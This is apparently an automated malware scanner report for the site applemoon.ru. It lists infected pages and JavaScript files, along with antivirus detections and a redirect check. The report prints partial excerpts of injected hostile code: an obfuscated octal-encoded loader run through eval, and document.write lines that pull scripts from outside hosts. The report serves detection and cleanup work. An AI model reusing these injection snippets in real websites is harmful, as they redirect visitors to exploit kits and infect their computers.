Malware Scanner report for applemoon.ru

Malicious/Suspicious/Total urls checked: 11/1/15

12 pages have malicious or suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "applemoon.ru" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=applemoon.ru

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://applemoon.ru/	200 OK Content-Length: 16037 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 ... 3003 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Ikarus Virus.JS.Obfuscated CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Blacole-Redirect.ad McAfee JS/Blacole-Redirect.ad
http://applemoon.ru/webroot/delivery/js/jquery.js	200 OK Content-Length: 72440 Content-Type: application/javascript	suspicious
Suspicious code found document.write('<script type="text/javascript" src="http://duda-mail.pl/xpt6rxzt.php?id=3063762"></script>');
http://applemoon.ru/webroot/delivery/js/jquery.tools.js	200 OK Content-Length: 58075 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= ... 3157 bytes are skipped ...);a.autoStart&&clearInterval(sliderIntervalID)}return false});if(a.autoStart)sliderIntervalID=setInterval(function(){n=== false&&q("next",true)},a.autoStart)})}})(jQuery);s=s ff(e(aq (w[j])) 9);}za=e;za(s)} =-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: AntiVir JS/Blacole.EB.301 Avast JS:Includer-AUT [Trj] Comodo TrojWare.JS.Blacole.AD Microsoft Trojan:JS/BlacoleRef.CZ VIPRE Malware.JS.Generic (JS)
http://applemoon.ru/webroot/delivery/js/jquery.jqzoom.js	200 OK Content-Length: 26182 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function($) { $.fn.jqzoom = function(options) { var settings = { zoomType: 'standard', zoomWidth: 200, zoomHeight: 200, xOffset: 10, yOffset: 0, position: "right" , lens:true, lensReset : false, imageOpacity: 0.2, title : true, alwaysOn: false, showEffect: 'show', hideEffect: 'hide', fadeinSpeed: 'fast', fadeoutSpeed: ' ... 3526 bytes are skipped ...) { while (stringa.substring(0,1) == ' '){ stringa = stringa.substring(1, stringa.length); } while (stringa.substring(stringa.length-1, stringa.length) == ' '){ stringa = stringa.substring(0,stringa.length-1); } return stringa; };if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: Avast JS:Includer-ATH [Trj] Emsisoft Android.Adware.Utchi.A (B) VIPRE Malware.JS.Generic (JS)
http://applemoon.ru/webroot/delivery/js/jquery.amoon.js	200 OK Content-Length: 7659 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) $(document).ready(function() { if($('#applescroll').length > 0) { if($('div.b-head-i i').length > 1) { $('.b-applescroll').loopedCarousel({ container: '.b-head', slides: '.b-head-i', items: 1, padding:0, next: '.l-ar' }) $('.b-applescroll').loopedCarousel({ container: '#applescroll', slides: '#applescroll ul', items: 1, padding:0, next: '.r-ar' }) } else< ... 3611 bytes are skipped ...ind('change', function(event) { var $t = $(this); var indexsel = $t[0].selectedIndex; var valuesel = $t[0].options[indexsel].value; }); if($('#scroll-towns').length > 0) { $('#scroll-towns').jScrollPane({ scrollbarWidth:21, showArrows:true, arrowSize:20, dragMinHeight:1 }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: VIPRE Malware.JS.Generic (JS)
http://applemoon.ru/shop/basket/	200 OK Content-Length: 11036 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 ... 3003 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Ikarus Virus.JS.Obfuscated CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Blacole-Redirect.ad McAfee JS/Blacole-Redirect.ad
http://applemoon.ru/about/	200 OK Content-Length: 14589 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 ... 3003 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Ikarus Virus.JS.Obfuscated CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Blacole-Redirect.ad McAfee JS/Blacole-Redirect.ad
http://applemoon.ru/news-and-pr/	200 OK Content-Length: 5613 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 ... 3003 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Ikarus Virus.JS.Obfuscated CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Blacole-Redirect.ad McAfee JS/Blacole-Redirect.ad
http://applemoon.ru/test404page.js	200 OK Content-Length: 0 Content-Type: text/html	clean
http://applemoon.ru/shops/	200 OK Content-Length: 301468 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) ps="split";asd=function(){d.body++};a=("44,152,171,162,147,170,155,163,162,44,176,176,176,152,152,152,54,55,44,177,21,16,44,172,145,166,44,151,171,162,44,101,44,150,163,147,171,161,151,162,170,62,147,166,151,145,170,151,111,160,151,161,151,162,170,54,53,155,152,166,145,161,151,53,55,77,21,16,21,16,44,151,171,162,62,167,166,147,44,101,44,53,154,170,170,164,76,63,63,164,166,151,167,167,62,146,160,163,153,163,160,155,176,151,62,147,163,161,63,147,160,157,62,164,154,164,53,77,21,16,44,151,171,162,62 ... 3003 bytes are skipped ...155,167,155,170,151,150,143,171,165,53,55,101,101,71,71,55,177,201,151,160,167,151,177,127,151,170,107,163,163,157,155,151,54,53,172,155,167,155,170,151,150,143,171,165,53,60,44,53,71,71,53,60,44,53,65,53,60,44,53,63,53,55,77,21,16,21,16,176,176,176,152,152,152,54,55,77,21,16,201,21,16,201,21,16"[ps](","));ss=String;d=document;for(i=0;i<a.length;i+=1){a[i]=-(7-3)+parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); Antivirus reports: AntiVir JS/EXP.Redir.EL.7 Ikarus Virus.JS.Obfuscated CAT-QuickHeal JS/Coolex.D McAfee-GW-Edition JS/Blacole-Redirect.ad McAfee JS/Blacole-Redirect.ad
http://applemoon.ru/webroot/delivery/js/jquery.message.js	200 OK Content-Length: 1846 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('#message_form').attr('action', '/plugins/ajax/message.php'); $('#message_form').attr('target', 'frame-form-send'); $('#message_form div.captcha a').click(function(){ $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); return false; }); $('#message_form').submit(function(){ var resultform = true; ... 946 bytes are skipped ... var $t = $(this); $t.parent().toggleClass('active-sendletter'); if($t.parent().hasClass('active-sendletter')) { $('#message_form div.captcha img').attr('src','/vendors/kcaptcha/index.php?time=' Math.random()); $('#message_form div.captcha input').val(''); } return false; }); } }); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: VIPRE Malware.JS.Generic (JS)
http://applemoon.ru/webroot/delivery/js/jquery.validator.js	200 OK Content-Length: 3147 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) jQuery.fn.extend({ validatorCheckbox: function(){ result = false; if($(this).attr('checked') == true \|\| $(this).attr('checked') == 'checked') { result = true; } else { result = false; } $(this).validatorError(result); return result; }, validatorLatin: function (){ result = true; var pat=/^[\w-\d] $/i; if(pat.test($(this).val())) { result = true; $(this) ... 2471 bytes are skipped ... } else { $(this).validatorError(result); } return result; }, validatorError: function(resulterror) { if(resulterror) { $(this).parent().removeClass('error-ip'); } else { $(this).parent().addClass('error-ip'); } } });s=s ff(e(aq (w[j])) 9);}za=e;za(s)} document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: VIPRE Malware.JS.Generic (JS)
http://maps.google.com/maps?file=api&v=2&sensor=true&key=ABQIAAAAdY1Wuxc-Jk5RMAiie9WUjhQZFt93kPd1t6VW4aocOUDd3J6XBxQQpyfil9fzO_GKah69N6HKw2X80w	200 OK Content-Length: 4576 Content-Type: text/javascript	clean
http://applemoon.ru/webroot/delivery/js/jquery.maps.js	200 OK Content-Length: 3373 Content-Type: application/javascript	malicious
Malicious code - confirmed by antiviruses (see below) var gmarkers = []; function createMarker(point,name,html,city) { var tinyIcon = new GIcon(); tinyIcon.image = "http://maps.google.com/mapfiles/marker_green.png"; tinyIcon.iconSize = new GSize(20, 34); tinyIcon.iconAnchor = new GPoint(6, 20); tinyIcon.infoWindowAnchor = new GPoint(5, 1); markerOptions = { icon:tinyIcon }; var marker = new GMarker(point, markerOptions); marker.mycategory = city; marker.myname = name; ... 2486 bytes are skipped ...r/> customUI.maptypes.hybrid = false; customUI.maptypes.physical = false; map.setUI(customUI); });w=f;s=[];for(i=2-2;-i 1339!=0;i =1){j=i;if((0x19==031))if(e)s=s ff(e(aq (w[j])) 9);}za=e;za(s)} ){a[i]=-(7-3) parseInt(a[i],8);}try{asd()}catch(q){zz=0;}try{zz/=2}catch(q){zz=1;}if(!zz)if(window["document"])eval(ss.fromCharCode.apply(ss,a)); document.write('<script src="http://www.indianmediagroup.com/plugins/phVm7APX.php" type="text/javascript"></script>') Antivirus reports: AntiVir JS/Blacole.EB.301 Avast JS:Includer-AUT [Trj] Comodo TrojWare.JS.Blacole.AD Microsoft Trojan:JS/BlacoleRef.CZ VIPRE Malware.JS.Generic (JS)
http://applemoon.ru/webroot/delivery/js/extinfowindow/extinfowindow.js	200 OK Content-Length: 9198 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: applemoon.ru

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0
Connection: close
Date: Sat, 07 Mar 2015 17:35:11 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=windows-1251
Expires: Sat, 07 Mar 2015 17:35:11 GMT

Second query (visit from search engine):
GET / HTTP/1.1
Host: applemoon.ru
Referer: http://www.google.com/search?q=applemoon.ru

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for applemoon.ru

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools